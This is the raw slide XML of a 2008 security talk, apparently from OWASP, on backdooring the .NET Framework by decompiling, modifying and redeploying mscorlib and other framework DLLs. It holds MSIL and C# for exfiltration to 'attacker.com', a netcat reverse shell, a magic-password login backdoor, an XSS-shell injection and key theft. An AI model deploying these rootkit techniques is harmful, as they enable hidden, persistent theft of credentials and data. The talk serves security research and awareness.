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9847-8B83-4622-ABD6-E1FFE7FAF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EF7A-B2E7-4A47-BAA0-03D9F6DFF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6506-8D58-4ADE-83D2-477450C03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4B7A-D9AD-4EEE-BCDB-D6141FBF9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E217-9053-4261-800C-F2F2F43FB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5D4A-69D4-4405-ADC0-A0C5B4C0A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B8B9-4D17-4EDF-BDBC-B7755E853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215D-C074-4028-9019-EA62228BD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E418-895C-4D76-99B9-93A08FF52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0378-5AB2-4966-80EC-23CCA0ED8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983B-BCD3-4D74-9B5B-00DC730FA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1ECD-E940-4AA1-BD97-540A9DE26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000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="96969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0FF-F0D0-44E6-89F3-39AE68CDAF44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" descr="2BSecure84"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6165720"/>
            <a:ext cx="137160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ezMetula@2bsecure.co.i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192.168.50.131/formsauthentication/login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asp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/7/77/OWASP_IL_7_DOT_NET_Reverse_Engineering.pdf" TargetMode="External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6324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NET Framework Rootkits - Backdoors inside your framework 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521360" y="464832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ept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657600" y="3657600"/>
            <a:ext cx="49528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ez Metula, CIS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curity Departme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ErezMetula@2bsecure.co.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cating the DLL in the G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the DLL in the GAC can be achieved using File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, we can identify mscorlib.d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ontains the WriteLine function (among with other important functions). It’s of the most important DLL’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 – it’s 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:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e08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A654-E0D6-47F1-A72A-2770C9D325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ompile the DLL using ildas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e know where it is - let’s copy it to some temp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to generate MSIL code out of i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dasm.exe disassembler will do this j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the next comma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DASM /OUT=mscorlib.dll.il /NOBAR /LINENUM /SOURCE mscorlib.d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now we have the decompiled code at mscorlib.dll.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8882-110F-4576-A171-9042F84615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ifying the MSIL c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next task is to modify its code – this is the best p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or can help us to analyze the code and decide where and what we want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fter detecting the location of WriteLine, I just doubled its MSIL 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hieve the “2 for the price of 1” pr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IL line recalculation need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size might needs to be recalcu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D767-80B0-4094-8E89-39EC30D72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Line in MSIL (original VS. modified cod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code of WriteLi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e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7086600" cy="180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2063880"/>
            <a:ext cx="7239240" cy="1403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2514600"/>
            <a:ext cx="71625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800600"/>
            <a:ext cx="71629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410080"/>
            <a:ext cx="71629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81952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819520"/>
            <a:ext cx="144792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 #1 (same as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505320"/>
            <a:ext cx="12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 #2 (dupl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A718-681D-4DF9-AF2A-25A63D16F5CA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mpile the DLL using ilas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step is to generate a new “genuine” DLL out of the modified MSIL code we ha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sm.exe assembler will do this j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the next comma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ASM /DEBUG /DLL /QUIET /OUTPUT=mscorlib.dll mscorlib.dll.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now we have a new modified mscorlib.d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6D50-369A-4F6D-A885-72CF866DE0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pass the GAC Strong Name mod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logical step is to overwrite the original DLL at the GAC with our modified D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not that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where things get a little bit trick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ramework is using a digital signature mechanism called SN (Strong N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LL has a unique signa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modified DLL have a different signature than the original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’t have Microsoft’s signing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gacutil.exe to install it back obviously fai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9D75-DE8A-412C-92FD-82FAAAA99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pass the GAC Strong Name mod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hought was to re-sign all the DL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, but it’s a very intensive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approach was taken, revealed during this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as found out that the signature is used just to map to the correct directory name on the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N mechanism does not check the actual signature of a loaded DLL but just looks for a DLL inside a directory with this signature name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C is broken, Strong Name is meaningles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ead of messing with signatures, we can just deploy the DLL inside the correct director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need direct access to the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0D46-4F78-4B5C-A084-845662C7A6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erting back from NGEN Native DL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hurdle we need to overcome is .NET’s precompile mechanism - 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s .NET assemblies into native cod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peeds things up and to avoid the J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ramework is not using our DLL but rather uses the nativ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e need to explicitly tell the framework not to use the native ver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n uninstall mscorlib.dll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50F4-75D1-4E1A-A94D-32B9B0616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ing the modified mscorib.dll and running the demo a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6B5A-0749-4A3D-8FA4-3EEEC15BD4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talling backdoors and rootk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now we know we can modify the framework and make it behave the way we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ossible to plant malicious code inside the framework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backdoor some sensitive internal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lso possible to deploy rootkits deep into the frame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licious code will be hidden and undetected inside the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review will never detect them because they’re not at the application leve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7F1E-3947-43CB-A7D6-716B75523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 – making code do more than it shoul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vial ques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should be the output of the follow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void Main(string[] ar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e.WriteLine("Hello (crazy) Worl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 – let’s run this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A147-42C8-4BEF-86B7-B4FCFA7D5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ootkit development - Function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better develop rootkits, it’s better to have a separation betwe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“ability” injected into the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that us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a new “ability” will be used in a couple of places, why not inject it as a new fun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’re extending the .NET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by side”  - Those functions can be injected separately or at once without interfering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goes for the payload code that execute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examples – let’s extend the frame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ToUrl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 url, string data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rseShell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 ip, int32 port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7348-5299-4B0C-B920-A1CFDFB304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ToUrl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ing url, string data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that will be used to transfer data from the victim machine to the att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transfer is implemented as an innocent http web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– the attacker’s collector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– the data to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65AE-EAB7-4DDB-9468-A9A44B3517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ToUrl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method public hidebysig static void  SendToUrl(string url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data) cil manag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Code size       20 (0x1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maxstack  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0:  no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1:  ldarg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2:  ldarg.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3:  call       string System.String::Concat(string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8:  call       class [System]System.Net.WebRequest [System]System.Net.WebRequest::Create(str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0d:  callvirt   instance class [System]System.Net.WebResponse [System]System.Net.WebRequest::GetResponse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12:  po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_0013:  r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// end of method Class1::SendToUr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599D-71C2-4D7C-989C-9E1542008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ToUrl us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now all we have to do is call this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it was already deployed as a function, calling it is very si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’s say there is a sensitive string (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omeSensitiveStolenData”) the attacker wants to send to his collector WebForm1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x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injected MSIL code will do the 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ocals init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ring V_0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L_0000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dstr     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omeSensitiveStolenData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L_0005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loc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L_0006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dstr     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ttp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ttacker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okieStealer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bForm1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+ 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x\?s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=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L_000b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dloc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L_000c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all       void System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bject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endToUrl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ring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ring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78C8-70A9-44A3-B957-4C654466DE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erseShell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 ip, int32 port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that will be used to provide a reverse shell to the att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unction contains an encoded version of netcat + cmd that is deployed to disk at ru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pired from the “dropandpop” aspx back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– the attacker’s collector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– the data to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D85D-DB70-4AE1-B575-3B8DEBEC01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erseShell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verseShell deploys netcat.exe + cmd.exe to the disk, and execute a reverse shell to the specified IP and PORT at the attacker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etcat IP PORT -e cmd.ex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(omitted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ethod public hidebysig static void  ReverseShell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ring ip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t32 port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il manag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//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de size       259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0x103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axstack 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cals init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(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ring cmdfilename,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ring filename,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int8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cat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lass System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O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BinaryWriter binWriter1,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int8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md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lass System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O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BinaryWriter binWriter2,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ring argument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lass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ystem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ystem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iagnostics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s proc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object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[]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S$0$0000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000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001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dstr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md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xe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006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loc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007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dstr     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cat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xe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00c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tloc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101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L_0102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}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//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nd of method </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="he-IL" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
              </a:rPr>
              <a:t>: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ReverseShe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21AF-5F89-49A3-A23E-90B2719500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erseShell usag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this function is very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ttacker needs to run netcat locally on his machine, waiting for incoming calls at port 12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 -l -p 12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his specified port will be originated from the victim machine, forming a reverse shell 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injected MSIL code will do the j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_0000:  ldstr      "192.168.50.129“  // attacker ip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_0005:  ldc.i4     0x4d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port 123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_0006:  call       void     System.Object::ReverseShell(string,int3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EA69-087A-4C2C-A833-5D4F32C2D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practical examples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ossible to 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ny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ky is the limit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 see some examples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F23C-0A6A-4EF8-BA27-0BB8BEDA1A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s authentications credential steal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Web.dll contains a boolean method called Authentic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tring name, string password) used by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append MSIL code to the end of this method, that will send the username and password to the attac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ToUrl(“attacker.com”, name+”:”+passwor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5203800"/>
            <a:ext cx="2971800" cy="827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>
            <a:off x="1066680" y="5432040"/>
            <a:ext cx="32004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5051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984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code (end of authent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998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ied code(post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300560" y="4441680"/>
            <a:ext cx="4843440" cy="22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2990-0A36-4E92-AD28-CB475BF160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s authentications credential stealing</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="28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192.168.50.131/formsauthentication/login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F145-1C72-4CC9-A2B2-B9DD8ED56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happened here ??!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ome there were 2 WriteLine’s instead of just one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swer is quite simple – The framework’s implementation of “WriteLine” was modified to print every string twice.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possible to change the .NET language implementation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46748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6A8C-6D24-478B-B699-878B2D3F1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dooring forms authentication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possible attack on the Authenticate function is to backdoor its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ime the supplied password will contain some special string (“Magic Value”) authentication will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add code to the beginning of Authent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password.equals(“MagicValue”)) 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ified code (seen as C# using Reflecto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4638600"/>
            <a:ext cx="5524560" cy="1914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90720" y="4876920"/>
            <a:ext cx="29718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055E-5993-4831-8CD2-C25C8B9DA7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lling a reverse shel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next example we’ll inject the ReverseShell function and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 make a reverse shell every time a winform executable is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for demonstration pusposes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e’ll inject code that execute our reverse shell into System.Windows.Forms.dll, at function Run(Form mainFo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A876-3B74-4BBB-8D2F-3CC4684604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lling a reverse shel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81560" y="2438280"/>
            <a:ext cx="378612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4376880" cy="2590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V="1">
            <a:off x="457200" y="3200400"/>
            <a:ext cx="495288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833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0574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071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ied code (pre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971800"/>
            <a:ext cx="381024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D17E-BEDB-4050-A478-8C9DBAB275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sh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295D-58AB-4E3F-BFE7-1970CE8E26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aling the connection string for every connection ope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Data.dll contains the logic for connecting to DB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 SqlConnection is responsible for opening the connection to the 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the behavior of Open() to send the connection string to the attac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’s in the class member Connection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Open() is chang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override void Open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ToUrl(“www.attacker.com”, this.Connection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B107-FB86-4425-AE7E-74E33CC477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ecting Browser exploitation framework into auto generated HTML/JS fi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ramework contains many pieces of HTML / Javascript code that is used by aspx pages as cod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- System.Web.d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se pieces of code are usually included inside the Framework DLL’s a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to inject persistent javascript code into the templates (similar to the concept of persistent X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– injecting a call to XSS sh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script src="http://www.attacker.com/xssshell.asp?v=123"&gt;&lt;/scri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A9D2-9C9A-4691-8756-7AA681DD3D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ryption key fixation / stealing /downgrading / etc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interesting attack vector against .NET cryptography at mscorlib.d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– Rijndael implementation of GenerateKe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# code from refl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fixation can cause encryption to always use the same key (removing the RNG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stealing can be achieved by sending the key to the attacker (using SendToUrl, for examp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/algorithm downgrading can be achieved by setting the least secure algorithm as the default for encryption (for example, setting the default symmetric algorithm to DES instead of the default AES.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90520" y="2819520"/>
            <a:ext cx="475308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CF26-9915-49BE-9FF6-2E3FD5EACF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ureString steal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String is a special string protected with encryption by the .NE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System.Security at mscorlib.d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String probably contains valuabl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would be interesting to inject code that will send this data to the att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inject it into the Dispose() method of Secure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# code from refle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Ptr ptr = System.Runtime.InteropServices.Marshal.SecureStringToBSTR(secure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ToUrl(“www.attacker.com”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Runtime.InteropServices.Marshal.PtrToStringBSTR(ptr)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E5DD-45D8-4999-AE50-BAF1465E3D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bling security check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ing around with CAS (Code Access Security) can be achieved by modifying the behavior of important classes from System.Security, System.Security.Permissions, etc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from mscorlib.dll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to disable security checks by changing the logic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AccessPermission::Demand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AccessPermission::Den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AccessPermission::Asser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IOPermission, RegistryPermiss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991D-C78A-4B7A-94FD-76E225B991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mating the process with .NET-Splo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NET-Sploit is a tool that aide in the process of injecting / modifying .NET assemb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e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a give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ject payloads – pre injection / post inj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pay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care of “code reshap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pired from H.D. Moore’s amazing “metasploit”  exploit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in beta stages, will be released so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9FA4-06E8-413C-B66F-07AD84B47D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052640"/>
            <a:ext cx="820872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141720"/>
            <a:ext cx="8137440" cy="158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661000"/>
            <a:ext cx="8424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052640"/>
            <a:ext cx="3168720" cy="3682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\ We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7840" y="3160800"/>
            <a:ext cx="2127240" cy="3682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Net Clas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3120" y="5608800"/>
            <a:ext cx="3206880" cy="3682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API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08360" y="5734080"/>
            <a:ext cx="1513080" cy="779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792000" cy="590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57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16000" y="148428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213372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1908000" y="1630440"/>
            <a:ext cx="1079640" cy="93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35400" y="1125360"/>
            <a:ext cx="5197320" cy="1739880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cc99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void class DoSometh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som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.WriteLine(“Some String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720" y="3644280"/>
            <a:ext cx="1529640" cy="36828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orlib.d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443640" y="189000"/>
          <a:ext cx="75240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189000"/>
                    <a:ext cx="7524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755640" y="3933720"/>
            <a:ext cx="1285920" cy="609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132000" y="3268800"/>
            <a:ext cx="5197680" cy="1465560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ff0000">
                  <a:alpha val="66274"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="9966ff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static void Write ( string val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 My Evil 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vilThing(value)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40000" y="115920"/>
          <a:ext cx="115236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115920"/>
                    <a:ext cx="115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419640" y="404640"/>
            <a:ext cx="30240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549360"/>
            <a:ext cx="576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627280" y="2492280"/>
            <a:ext cx="18734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3500280"/>
            <a:ext cx="14292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3500280"/>
            <a:ext cx="115272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92000" y="4437000"/>
            <a:ext cx="180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92720" y="5229360"/>
          <a:ext cx="3168720" cy="1414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92720" y="5229360"/>
                    <a:ext cx="31687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867280" y="6344640"/>
            <a:ext cx="1771920" cy="368280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="bbe0e3">
                  <a:alpha val="38039"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="ffffff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8160" y="5516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ck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5950080"/>
            <a:ext cx="1150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3284640"/>
            <a:ext cx="5197680" cy="1465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static void WriteLine ( string val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som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the internal implementation of WriteL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1B35-DB36-4DEA-AA7B-040571221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a full automated DLL modification using .NET-Spl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924680" cy="25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2F53-C21A-426C-A6A4-99833FFFAA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ngs to consider when injecting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/ post consid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to inject your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reference – function are not restricted to the same d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used methods you want to injec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to assemb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ing traces with NG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8DDD-3120-4785-9AF6-24B710C8E1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 of the framework behavior can lead to some very interesting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ttacker who has already rooted your machine can backdoor your framework, leaving rootkits beh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se rootkits can turn the framework upside down, letting the attack do everything he w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t’s hidden deep inside the framework DLL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the owner of the machine, there’s not much you can do about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use external file tampering detectors, such as trip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should give the .NET Framework a kernel level modification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lthough this concept can be used maliciously, it can still be used positively to make custom “MOD” frameworks for topics such as performance, bug fixing, and mo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FD6B-55BB-4667-8D38-CE1A280BDE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Semibold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11AE-4F76-43E6-8B8C-3255798FFB0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Semibold"/>
              </a:rPr>
              <a:t>Thank you !</a:t>
            </a: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111E-D651-40E8-A613-2A04CBCEBB6F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.NET execution model &amp; .NET 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ing the Framework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in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 backdoors and rootk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ng the process with .NET-Spl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consider when injec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7A27-0702-43AF-B5AB-3FC894909B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the .NET CL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LR is the heart of the .NE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 virtual machine component responsible to run .NE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NET code is compiled to MSIL, which is converted to native cod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by the JIT (just in time)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3962160" cy="22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33814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FB53-6E2E-477C-9A59-05830BDEF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4" dur="123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5" dur="123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" dur="123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.NET Reverse Engine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 a .NET assembly (DLL) is the counter process of compi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 back from MSIL code to higher level .NET code (C#, VB.NET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reversing is usually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 assembly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assembly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tools that helps with that, from trivial decompiling to advanced runtim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’ve discussed it deeply in previous OWASP conference me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owasp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org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images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7/77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OWASP_IL_7_DOT_NET_Reverse_Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="he-IL" sz="18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22C7-27EF-48A4-A239-EC767675AE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ifying the Framework co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concept can be applied to the Framework’s own DLL’s (any ver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a post exploitation type attack, that requires administrator level privile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side note – can also be applied to Java’s JV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composed of the following ste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e the DLL in the GAC, and copy it out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mpile the DLL using ilda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the MSIL code (the most interesting par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pile to a new DLL using ila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pass the GAC strong name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rting back from NGEN Native D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loy the new DLL while overwriting the orig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0852-2396-4C36-9066-7A57FF906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mon – locating which DLL’s are used and their location in the G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or – analyzing the DL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asm – compiling (MSIL -&gt; D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dasm – decompiling (DLL -&gt; MS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editor – modifying the MSI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gen - native comp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8AA-58C1-4CA6-B929-08107C35D4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 </cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-09-14T08:45:34Z</dcterms:modified>
  <cp:revision>32</cp:revision>
  <dc:subject>Application Security</dc:subject>
  <dc:title>OWASP Plan - Strawman</dc:title>
</cp:coreProperties>
</file>